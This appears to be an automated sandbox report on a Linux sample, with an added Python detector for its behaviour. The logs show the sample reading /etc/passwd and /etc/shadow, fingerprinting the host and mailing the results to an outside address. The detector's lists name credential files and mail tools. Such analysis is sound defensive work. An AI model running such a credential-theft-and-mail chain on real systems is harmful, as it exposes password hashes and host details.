Analysis Overview
SHA256
90be418508dffa4910e0fd27fd29627260bb3fab2147344c624f99c51fd56404
Threat Level: Likely benign
The file 15c7b600329249a4895395e61a9a88fe_JaffaCakes118 was found to be: Likely benign. The score is heuristic; the process lists below show the sample reading /etc/shadow, pinging 216.115.108.245 and handing collected host information to /usr/bin/mail, which is worth reviewing manually before accepting the verdict.
Malicious Activity Summary
Checks CPU configuration
Reads CPU attributes
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-27 11:10
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-27 11:10
Reported
2024-06-27 11:13
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
11s
Max time network
131s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/uptime | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/free | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/meminfo | /usr/bin/free | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/uptime | N/A |
| File opened for reading | /proc/uptime | /usr/bin/uptime | N/A |
| File opened for reading | /proc/loadavg | /usr/bin/uptime | N/A |
| File opened for reading | /proc/self/mountinfo | /bin/df | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/free | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/info2 | /tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118 | N/A |
Processes
/tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118
[/tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118]
/bin/uname
[uname -a]
/bin/grep
[grep inet]
/sbin/ifconfig
[/sbin/ifconfig]
/usr/bin/uptime
[uptime]
/bin/cat
[cat /proc/cpuinfo]
/bin/cat
[cat /etc/passwd]
/bin/cat
[cat /etc/shadow]
/bin/df
[df -h]
/usr/bin/free
[free]
/bin/ping
[ping -c 2 216.115.108.245]
/bin/cat
[cat /etc/hosts]
/bin/sleep
[sleep 5]
/bin/cat
[cat info2]
/bin/uname
[uname -a]
/bin/sleep
[sleep 5]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.65.91:443 | | tcp |
| US | 151.101.65.91:443 | | tcp |
| GB | 195.181.164.18:443 | | tcp |
Files
/tmp/info2
| MD5 | 2bb6aed5111ef9726bcf6eef982ff32b |
| SHA1 | 4d49d894436449e792b0cdf8522584065b298c90 |
| SHA256 | e5e61fed291cefe8bd2c2b895b3001e679931c3d93f3597fb5e27b5bcae8f825 |
| SHA512 | 5c0aa37c6fa67edf72abdd2f7789538d0a2c12a1fec2dc575ee1df3c1874a4bda33259b3b60127ef4365410d85c742a0fb463f920b99c30863ff3c502494b3bf |
/tmp/info2
| MD5 | 335ece3e9dba12747d3e10bb8db453dd |
| SHA1 | 03c7fbd3b7ac9aea1fb78136361a948513d89ee8 |
| SHA256 | ca61c9a13c329ab2e5b8171436f31ddea0d2283f7a2616e2d50e4656f9c63be4 |
| SHA512 | 3c9e53b8c10ee9c8b8c727d9ed897b88773d2b201d961b945a0afdfe627bfe04ca258b35f2d409f9e4d93ac117bce3f503c29f36c4a65d0c4d389d181959a32e |
/tmp/info2
| MD5 | b0b11628c9fc34dacdfa7064ad4e04b0 |
| SHA1 | e214b69b58448da323912968aad22e9148704847 |
| SHA256 | caa61489c7e16b8d6d829b03db34fa7b5d878adc6eaca3bb755fdab2749d3f52 |
| SHA512 | def71617c0672e34b8a98d4a6c851d36b839895d5b84d48dc4ee3023aff12072b1bbbc26f822aa2c17c6b935325d5fb7b7f4116cf87e1ac472eb1e73d1cecfcc |
/tmp/info2
| MD5 | 29ebed68cace8f8b5105c01253263b8e |
| SHA1 | f1f23c180947993968dd7ace165936e21f598ac4 |
| SHA256 | 4258bd3c42b7e89fbb33d60c5f2adc4216e87c77643202f7caecde87ac87c9ab |
| SHA512 | 39e8b1c4c6f8ac6634f4581bc152aaa2402a9cd99eccfb4430de0d694306390808cacab654e079ec2df779f9b7844a44277fc1039f4a403a98a5ebcdcdd53bac |
/tmp/info2
| MD5 | 8cb7586a325ebd65d8e4f23246986562 |
| SHA1 | 48c5f5806446ecf76120daf4336bdf755f518ac3 |
| SHA256 | 460c7ebd8b4f7c14b75e05d96307796cfb092fa88a8c0915e7ea115c9846f478 |
| SHA512 | a6adb0766e868481f2739010042554be44d90a1a9ea3c97411547579c55588bc3544227a2d73e8a966c0230a205a7c96d99e122ba832904376edc3787714453a |
/tmp/info2
| MD5 | f98849479006f7b7801f2c55e02be569 |
| SHA1 | 27701cea48f1e0fd27586e0976c8b12f7195f29a |
| SHA256 | e47942d84e33bdd142e170dbf479f017ee801d6c4007737f43eae9030e784782 |
| SHA512 | b32b4cf0d6fddf752d80b388572d0e96740525f3ac895321c03d987fda6926940160b7944aeacbe31bf47e9b6915dc3ec9c0ecb94e580e79fdd16c826abdc732 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-27 11:10
Reported
2024-06-27 11:13
Platform
debian9-armhf-20240611-en
Max time kernel
18s
Max time network
21s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/uptime | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/free | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/uptime | N/A |
| File opened for reading | /proc/uptime | /usr/bin/uptime | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/free | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/free | N/A |
| File opened for reading | /proc/meminfo | /usr/bin/free | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/sendmail | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/exim4 | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/uptime | N/A |
| File opened for reading | /proc/loadavg | /usr/bin/uptime | N/A |
| File opened for reading | /proc/self/mountinfo | /bin/df | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/muMv7q9y | /usr/bin/mail | N/A |
| File opened for modification | /tmp/info2 | /tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118 | N/A |
| File opened for modification | /tmp/mu0nxEma | /usr/bin/mail | N/A |
Processes
/tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118
[/tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118]
/bin/uname
[uname -a]
/sbin/ifconfig
[/sbin/ifconfig]
/bin/grep
[grep inet]
/usr/bin/uptime
[uptime]
/bin/cat
[cat /proc/cpuinfo]
/bin/cat
[cat /etc/passwd]
/bin/cat
[cat /etc/shadow]
/bin/df
[df -h]
/usr/bin/free
[free]
/bin/ping
[ping -c 2 216.115.108.245]
/bin/cat
[cat /etc/hosts]
/bin/sleep
[sleep 5]
/bin/cat
[cat info2]
/bin/uname
[uname -a]
/usr/bin/mail
[mail -s Linux debian9-armhf-20240611-en-7 4.9.0-13-armmp-lpae #1 SMP Debian 4.9.228-1 (2020-07-05) armv7l GNU/Linux [email protected]]
/usr/sbin/sendmail
[/usr/sbin/sendmail -oi -f root@debian9-armhf-20240611-en-7 -t]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1sMl9o-0000BP-2E]
/bin/sleep
[sleep 5]
/usr/sbin/exim4
[/usr/sbin/exim4 -t -oem -oi -f <> -E1sMl9o-0000BP-2E]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1sMl9r-0000Be-Ow]
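The process lists for behavioral1 and behavioral2 (and the identical mips runs) show one chain: host fingerprinting (uname, ifconfig, uptime, cat /proc/cpuinfo, df, free), a read of /etc/shadow, a ping to 216.115.108.245, and then a hand-off to /usr/bin/mail. The mail line also shows the uname output split into separate arguments after "-s Linux", so mail(1) treats each token as a recipient; the second Exim message submitted with "-f <>" and "-E" (Exim's empty envelope sender and locally generated failure-report flags) is consistent with the MTA bouncing those junk recipients. The detector below is an added example, not the sandbox's signature code: it runs over events constructed from the page's process entries, assumes a tab-separated "exe<TAB>cmdline" sensor format, and uses a placeholder recipient address because the page redacts the real one.

```python
"""Added example: flag the recon-then-mail chain and extract IOCs from a
process-event dump.  Events are constructed from the page's process list;
the sensor format and the recipient address are assumptions."""
import ipaddress
import re
from dataclasses import dataclass, field

RECON_BINARIES = {"uname", "ifconfig", "ip", "uptime", "df", "free",
                  "hostname", "id", "whoami", "netstat", "ss"}
CREDENTIAL_FILES = {"/etc/shadow", "/etc/gshadow", "/etc/master.passwd"}
MAIL_CLIENTS = {"mail", "mailx", "sendmail", "exim4", "msmtp", "ssmtp"}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

# Constructed from the behavioral2 process list ("<exe>\t<cmdline>" per line).
# user@example.invalid stands in for the recipient the page redacts.
SAMPLE_EVENTS = """\
/tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118\t/tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118
/bin/uname\tuname -a
/sbin/ifconfig\t/sbin/ifconfig
/bin/grep\tgrep inet
/usr/bin/uptime\tuptime
/bin/cat\tcat /proc/cpuinfo
/bin/cat\tcat /etc/passwd
/bin/cat\tcat /etc/shadow
/bin/df\tdf -h
/usr/bin/free\tfree
/bin/ping\tping -c 2 216.115.108.245
/bin/cat\tcat /etc/hosts
/bin/sleep\tsleep 5
/bin/cat\tcat info2
/bin/uname\tuname -a
/usr/bin/mail\tmail -s Linux debian9-armhf-20240611-en-7 4.9.0-13-armmp-lpae #1 SMP Debian 4.9.228-1 (2020-07-05) armv7l GNU/Linux user@example.invalid
/usr/sbin/sendmail\t/usr/sbin/sendmail -oi -f root@debian9-armhf-20240611-en-7 -t
"""


@dataclass
class Finding:
    rule: str
    detail: str


@dataclass
class Verdict:
    findings: list = field(default_factory=list)
    iocs: dict = field(default_factory=lambda: {"ipv4": set(), "email": set()})

    @property
    def rules(self):
        return {f.rule for f in self.findings}


def parse_events(text):
    """Turn the dump into (exe, argv) tuples, skipping blank lines."""
    events = []
    for line in text.splitlines():
        if line.strip():
            exe, _, cmdline = line.partition("\t")
            events.append((exe, cmdline.split()))
    return events


def _is_global_ip(text):
    try:
        return ipaddress.ip_address(text).is_global
    except ValueError:
        return False


def _mail_positional_args(argv):
    """Tokens mail(1) would treat as recipients: non-option arguments,
    with the value following -s (the subject) skipped."""
    out, skip = [], False
    for tok in argv[1:]:
        if skip:
            skip = False
        elif tok == "-s":
            skip = True
        elif not tok.startswith("-"):
            out.append(tok)
    return out


def analyse(events, recon_threshold=3):
    """Walk the events in order; recon must precede the mail client to fire."""
    v, recon = Verdict(), []
    for exe, argv in events:
        if not argv:
            continue
        name = exe.rsplit("/", 1)[-1]
        if name in RECON_BINARIES or (
                name == "cat" and any(a.startswith("/proc/") for a in argv[1:])):
            recon.append(" ".join(argv))
        if name == "cat":
            for path in argv[1:]:
                if path in CREDENTIAL_FILES:
                    v.findings.append(Finding("credential_file_read", f"{exe} read {path}"))
        if name == "ping":  # a connectivity check doubles as an IOC
            v.iocs["ipv4"].update(ip for ip in IPV4_RE.findall(" ".join(argv)) if _is_global_ip(ip))
        if name in MAIL_CLIENTS:
            v.iocs["email"].update(EMAIL_RE.findall(" ".join(argv)))
            if len(recon) >= recon_threshold and "recon_then_mail" not in v.rules:
                v.findings.append(Finding("recon_then_mail", f"{len(recon)} recon commands before {name}"))
            if name in {"mail", "mailx"}:
                junk = [a for a in _mail_positional_args(argv) if not EMAIL_RE.fullmatch(a)]
                if junk:  # unquoted $(uname -a) turned into recipients
                    v.findings.append(Finding("mail_unquoted_args", f"{len(junk)} non-address recipients, e.g. {junk[0]!r}"))
    return v


if __name__ == "__main__":
    verdict = analyse(parse_events(SAMPLE_EVENTS))
    for f in verdict.findings:
        print(f"[{f.rule}] {f.detail}")
    print("IOCs:", verdict.iocs)
```

The recon threshold keeps a lone `uname -a` or `df -h` from firing; the chain rule needs several fingerprinting commands before a mail client in the same process stream, and the junk-recipient rule explains the bounce traffic and the nine hostname lookups to 1.1.1.1 that follow the mail call on this page.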
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-7 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-7 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-7 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-7 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-7 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-7 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-7 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-7 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-7 | udp |
Files
/tmp/info2
| MD5 | 2bb6aed5111ef9726bcf6eef982ff32b |
| SHA1 | 4d49d894436449e792b0cdf8522584065b298c90 |
| SHA256 | e5e61fed291cefe8bd2c2b895b3001e679931c3d93f3597fb5e27b5bcae8f825 |
| SHA512 | 5c0aa37c6fa67edf72abdd2f7789538d0a2c12a1fec2dc575ee1df3c1874a4bda33259b3b60127ef4365410d85c742a0fb463f920b99c30863ff3c502494b3bf |
/tmp/info2
| MD5 | 903670a38483b980318f98b150af5e7e |
| SHA1 | d9b2a72f60d7cd0aa21eab4dc978be181ea241ae |
| SHA256 | 93fe87fb401dedd150de8622a5422e07f50d2113d1637da87160399e917fbc96 |
| SHA512 | 98d0477745e111563325df8254a95a7e1305522e6daf659791ad157eeb4ab949d883f95a12b3c9ef390ad2f746050539d535ad433d82c8dbb29913d56c3c4d3e |
/tmp/info2
| MD5 | 88d609b25a8d9c552cb539261483f936 |
| SHA1 | ede078695f97bf559efbf3d4c86776c2037315c2 |
| SHA256 | 03153481a83245ce82a3b3ecf76684446d129ae759fe91d154ebaa6b87ce606d |
| SHA512 | 196fc9f706a4a1a3fe7b55525a44ecbb511d7074a0d6a5e310474049e17df6e40e450a8c70de6e16ee196d29f7a84bc9360e5d1dc30cb87c1605e9f127c9c6ab |
/tmp/info2
| MD5 | 6bccf5861b3d60ff36a794f0b9c90898 |
| SHA1 | 65b6ed091dda6e7ec7e3ca3646880d018751e2ca |
| SHA256 | 4a31dab07ccaafacfad98c186640e2e4c86af6b96d10818732af23924731437a |
| SHA512 | afcf7b5a76ad39de053e82bd4bbe39bac370641a86593a10f103c2d9237d39697d3e87893c5578eef6ed0d594016fc0eedcb9189b3db2ef89f4c73866dbedf48 |
/tmp/info2
| MD5 | e8cf5823d4b3e8f453cfae1dc1e343ed |
| SHA1 | b277cad63e1daec54027bca427be63713742e646 |
| SHA256 | 8aeb6b0cdaa39af408d33a71784981cf1be5e251b1817af3d5f169798be77d94 |
| SHA512 | 001d2e7f43322802c9f2bc6ae633a3e8f6703a8247e30ac91c7c2e62ff4c3839befe24d458c885ab81c65f555057733e2bb9e80e17c0a31f99be3d3d03e4dc19 |
/tmp/info2
| MD5 | 7289e35b3777e55732c7832cd79a196a |
| SHA1 | bd5d2ed181de9ecbfa8863e379743772b8467c23 |
| SHA256 | 38272b344be7cc003a9535e0bcd4e3fa520997e7363168468e0e598e8f9d149b |
| SHA512 | dbcab41ed6b7ac1277b5e5f153876bb4a406ea829d884ba1ba4c386c6981148ae6a9615e951d885721fdae1fc58ab82c4e46dd0611959ad2a188e5f524c57f51 |
/var/spool/exim4/input/1sMl9o-0000BP-2E-D
| MD5 | 252e90165600b216897520af4651d365 |
| SHA1 | e7c3d7d22a455c6b4be3da584df8c464017349d7 |
| SHA256 | bae03c9507e59c15c707124b7317d6f27b932ea2d68e878aec0295069e825138 |
| SHA512 | 04d0a8dc3c8c0146e2c630499f93d90fa13afba1cb739f4d96b9c116d5f5e9d07ff275317bb6a3aa9af5c7228a99f00481ae757509b9212732dc8419d1405e09 |
/var/spool/exim4/input/hdr.707
| MD5 | 9c5dee6e7563e37f484ccf907157edda |
| SHA1 | 8a681af6a7489a07bac173eb20f130ddfe411807 |
| SHA256 | 8f26da4161c54fdf411dd0602b4b3da166bd30e62219f8e654034e3ca4ae09ca |
| SHA512 | 674d4ca5f963dd95b3fb97f2a076088e6e043c70001b49a99c77fea25bf7a77823a854f2f20d1be5817c8ea3de8d74fcb9c5a91efb6f21afc13ba9508d0bdc3f |
/var/spool/exim4/msglog/1sMl9o-0000BP-2E
| MD5 | 8608aa6c39c516a1b3dbe2ce47801e1a |
| SHA1 | fd0b1152dd65f80e190577824d5b9cee7ff2a7d6 |
| SHA256 | e9b1052de7904483433f1d3175ebaebc5ae46be8fcf3cb9dea2ce616035e1c59 |
| SHA512 | d67b34370cabd108d4cf88fe0afcdfdaeae480693729374228e915a1cd781e3b41d964e76e76a916d993d2560dc3a17b10a0fe9d50fb05418293b03405bee734 |
/var/spool/exim4/msglog/1sMl9o-0000BP-2E
| MD5 | b2e0e175bb592a71f906ce85f1b0c777 |
| SHA1 | 76ac787566330e04cff1f37c24d7ca816790b7ed |
| SHA256 | 4cd942bbe021a0d12194269980962e9421099503fe47385123755e9c7356758d |
| SHA512 | 5066df3ec71822928c51f750fda681cd8a504e4e329166ae1f171c708bc552df39e1746ed7a01e3e27a4b6dfc952562afe55d2f4cc57d97fac8a1eea608060fc |
/var/spool/exim4/input/1sMl9r-0000Be-Ow-D
| MD5 | 44e43453150ae4e9261ebecfd33dc5bf |
| SHA1 | 73fff7b9ff889747216ee28d4c46ca6a01df2cce |
| SHA256 | da736bd8e4c48a02bb65e0e5939088f2c27d6b94e89d8b257d2ace187ad63dc8 |
| SHA512 | 67ca65ab0621c3d6731931c0eec0326897b9661a837c3f5bb797c4a39d346f4942212d02bad93f74e81b79d94f8d09da0565746b647cffee573855358b34028d |
/var/spool/exim4/input/hdr.722
| MD5 | 79c9a7ba4c3d1c644772cb3842d75248 |
| SHA1 | 1ead640a1d571c30b7f6ae076f238f9e8c134405 |
| SHA256 | 7a8ac66d9cb22a7838421613dbb65e69c43914fe68e1aba6282c6f354db4e4cc |
| SHA512 | a8841db8a238a9c525253f0b9a269c10264278c172d9b5f8bd4a6fc662850c13ece3b555d3996692e94215d4dd8f93b9a647c41052ff3576f8e7017b1d75f567 |
/var/spool/exim4/msglog/1sMl9r-0000Be-Ow
| MD5 | 0c05b6c2476107483ffeefeef603d247 |
| SHA1 | 3eb339f9c6bcabfbf969d002d234474001fbe604 |
| SHA256 | 53b1be03c1c48c27c05a9984b6150eefa970a93e40d0225e3d6a9b6404d7e267 |
| SHA512 | 7404c2e39887c7b39cc03983f90caa3b8eb7e578d2206d21d170fcd2aa6a0951788bc7ffc5631ed9beb34985861fbdfea63b3e473f73775367dd734fdd87d15d |
/var/spool/exim4/input/hdr.713
| MD5 | 6f6a7c6c332a08ab6c982acdf34117f4 |
| SHA1 | 03e8c95d020a9f6ec81b1838caf656fc7154e26a |
| SHA256 | fbd687a45d5d3d545f24d4651f334327ac33eb4e39e31f149a8c076eb36a735d |
| SHA512 | a0be90e8ec23963268f29ed89ca44a74eedeef440802009111169847f9cb852052b264b2f0a55c396732aee907e1473c0c8e65d5a8e2ef202a84281f7985825e |
/var/mail/user
| MD5 | 4275f4ffb87a044f6315d870df0b37a3 |
| SHA1 | b71f04a5f73286bba95e04b4a488b2cb5e4118c4 |
| SHA256 | a61118165453514b76f7a1f175500d55a7382a0d24d34dac715b198986443f72 |
| SHA512 | 2f87fc51fc1a504769be18c6269170901f06e82d304723a2edcd5676d7d5d676e98c26168972bdec6fc53b1cd6fe3d52e3152626325a2612550bdb615fe12266 |
/var/spool/exim4/input/1sMl9r-0000Be-Ow-J
| MD5 | d7d96d63d643a4ce3e408eba7dfcedc5 |
| SHA1 | c53607f95c5c57beafc1d8266646797a035f76ea |
| SHA256 | 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159 |
| SHA512 | 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3 |
/var/spool/exim4/msglog/1sMl9r-0000Be-Ow
| MD5 | 349f43aeee342f44d53f7268d8a96269 |
| SHA1 | 737b1f30b9c7e72f20411996dbfab05ad0c258cf |
| SHA256 | 37f4959f2c9ba4116f2949ea3da25e065a7cf7bb76de82ab85249e1f51106925 |
| SHA512 | 590e87f2871a419cee80fb9f25d4180ef1076d0b41c6f253c4fdbd82df48b1bf87674a8de1edca97037e8be37cb4d6d8541642099a23ae3434ac8c40b2f5a47a |
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-27 11:10
Reported
2024-06-27 11:13
Platform
debian9-mipsbe-20240611-en
Max time kernel
30s
Max time network
34s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/uptime | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/free | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/loadavg | /usr/bin/uptime | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/exim4 | N/A |
| File opened for reading | /proc/self/mountinfo | /bin/df | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/free | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/free | N/A |
| File opened for reading | /proc/meminfo | /usr/bin/free | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/sendmail | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/uptime | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/uptime | N/A |
| File opened for reading | /proc/uptime | /usr/bin/uptime | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/info2 | /tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118 | N/A |
| File opened for modification | /tmp/mupIalin | /usr/bin/mail | N/A |
| File opened for modification | /tmp/mupzzMbI | /usr/bin/mail | N/A |
Processes
/tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118
[/tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118]
/bin/uname
[uname -a]
/sbin/ifconfig
[/sbin/ifconfig]
/bin/grep
[grep inet]
/usr/bin/uptime
[uptime]
/bin/cat
[cat /proc/cpuinfo]
/bin/cat
[cat /etc/passwd]
/bin/cat
[cat /etc/shadow]
/bin/df
[df -h]
/usr/bin/free
[free]
/bin/ping
[ping -c 2 216.115.108.245]
/bin/cat
[cat /etc/hosts]
/bin/sleep
[sleep 5]
/bin/cat
[cat info2]
/bin/uname
[uname -a]
/usr/bin/mail
[mail -s Linux debian9-mipsbe-20240611-en-2 4.9.0-13-4kc-malta #1 Debian 4.9.228-1 (2020-07-05) mips GNU/Linux [email protected]]
/usr/sbin/sendmail
[/usr/sbin/sendmail -oi -f root@debian9-mipsbe-20240611-en-2 -t]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1sMl9w-0000Bv-NJ]
/bin/sleep
[sleep 5]
/usr/sbin/exim4
[/usr/sbin/exim4 -t -oem -oi -f <> -E1sMl9w-0000Bv-NJ]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1sMlA5-0000By-UI]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-2 | udp |
Files
/tmp/info2
| MD5 | 2bb6aed5111ef9726bcf6eef982ff32b |
| SHA1 | 4d49d894436449e792b0cdf8522584065b298c90 |
| SHA256 | e5e61fed291cefe8bd2c2b895b3001e679931c3d93f3597fb5e27b5bcae8f825 |
| SHA512 | 5c0aa37c6fa67edf72abdd2f7789538d0a2c12a1fec2dc575ee1df3c1874a4bda33259b3b60127ef4365410d85c742a0fb463f920b99c30863ff3c502494b3bf |
/tmp/info2
| MD5 | e797a6d6452f2e9b0bec3fb481474e76 |
| SHA1 | 8210d76a37aa5214ca436f510647134647a2020e |
| SHA256 | ea81f932b0736b26fa123427b61d4fb505d631553a0e5c0b7281e956b6e1e36e |
| SHA512 | aa8d94576a38eb29b6bf7a70c478cbe5dbb04e972d0d4596afef091b9f4df6133796d1a0ab183ec6902c18572995767653580b52fc5c0d98f78f3e10a1b86713 |
/tmp/info2
| MD5 | c9d801e5d5f2753a07c1a307045b8cf2 |
| SHA1 | 29001e54f57a5e264b3760f70c5d6b3c34850e9f |
| SHA256 | f34b16685e23364aaa810d0e190d5992da35c440ab9c1a2770f652ecb8b0831f |
| SHA512 | 5643bc1ad8812d520dd89d10080f5d2f7c8cacde58e2e4bccbcde01e75887ea836bc22add7e01e652ef3f5317a736775dce934d3a5a492c035acea2f3073cbd6 |
/tmp/info2
| MD5 | 8ca71b821bac4b134680ec78feefd883 |
| SHA1 | 3954007726c32e7c4a79a404bbb30000f0cc0ebb |
| SHA256 | 334748cfac8c69e731eab0a1b10b531c0f9c5fe9480d59d4d8d71ccbe58fd097 |
| SHA512 | 29ce141eacc766a7f32dd685e4ab473f8ec230bcc522ae61ed190b4491f291169b23a6403a90b7a728367ffa59f67e0d0bf60e0469d748681cb7496aa37e82d7 |
/tmp/info2
| MD5 | 0e3e21bce64867fc6bec23e24d08f81e |
| SHA1 | fdc6cfb76e7ac6547e437cf0b8b21881a4c4ddbf |
| SHA256 | dbbd961c7bb7342809575a9d52c4f2ec25f40a8fa9812dc3c2438cbac4c65ce8 |
| SHA512 | 3f9eb23aaaa5614b50478d458bb3a0d5d5334129c33a487496563545bbd5860fa0857e288c612ab766008f368c501c708b1a38bbc0d88522fec95c878bc7311f |
/tmp/info2
| MD5 | 14d0b7ed1644a1c2b90e919b47e3e6ce |
| SHA1 | 8c044a952a046cc558af0ce3ae8a43bb72b0ce94 |
| SHA256 | 7915b58d0bf16108faf62a5858f3e978017e15fc7f0b66b2879e2fdcf9f5c99c |
| SHA512 | 755364b301a0a8038b43fa973b60bebb18cf8244e23117b54f6da4b78726b39d7ce15020bde8d37a43e7c09e7971b32fc87a69bc22497984dc202a066ad94b70 |
/var/spool/exim4/input/1sMl9w-0000Bv-NJ-D
| MD5 | 453f20bbeede53fd99eb3ec6208f7f71 |
| SHA1 | b8c6aa011f756fec1a0945f46d2c49cac0605cf0 |
| SHA256 | f46e288f77b829e278186e6843394db376c2b9625ad1604ccdc96683980b354c |
| SHA512 | d350c4d624582f772ae8320aeef22441082ce477c1c1e70a5ec3268bdb27e2052c6f49ba7566385fbced6f1c426c78e41bb76d0dbdf985f26737a3b234093262 |
/var/spool/exim4/input/hdr.739
| MD5 | 3ed04779713171e36899d34c25d062cc |
| SHA1 | fe6ccaea89a75bc9cce7c22524e006c27b5c1fa6 |
| SHA256 | 2494873187b203be20d9c4ab8af2d6ca64401a84f4957d1373a8bcabfd87af58 |
| SHA512 | 9ef0dc52c2a21671e4619aa6d3e86d2168d467a5fcc17928c478b0ff2eb7404510f86ac5ffb3085aa37b34716a1b432047c7e1f22cb8c19d0f7cb2d485e1349c |
/var/spool/exim4/msglog/1sMl9w-0000Bv-NJ
| MD5 | 048a07fe652656dd62d266caf0b06708 |
| SHA1 | 03d19037e01a2ebe61182cc6dabca88b5b2bde5a |
| SHA256 | 57570f974e28d43d722700ac288b4457c397f1d325473861ae9c6de9b700dd29 |
| SHA512 | 942b6838547f1ccfed6d8c89ddb02fe7bfddfef61504ee81534b4cbb0e601a7f326e52a2a451cade02dd025169fddad5bb0c7797ccc93f3253cfc06597488095 |
/var/spool/exim4/msglog/1sMl9w-0000Bv-NJ
| MD5 | 53ca7b4a51ac3e72bbdd33bea20f0cec |
| SHA1 | f7d54fa6d04862b47739c5c499af59dd97a6ae03 |
| SHA256 | c4aee2a5fa29c5a1dc7d6659c59f5d891fa485ae28b15c82e5a5c6fdad4c21b2 |
| SHA512 | 24005a40edaaf919e6d4613f9ad03bc13392ea15c4f5c75ef92512484ca1aec4e021c8c3996f3618fd11c3760f2fbd20939782c8805c888bd2f4e9b3d88d230b |
/var/spool/exim4/input/1sMlA5-0000By-UI-D
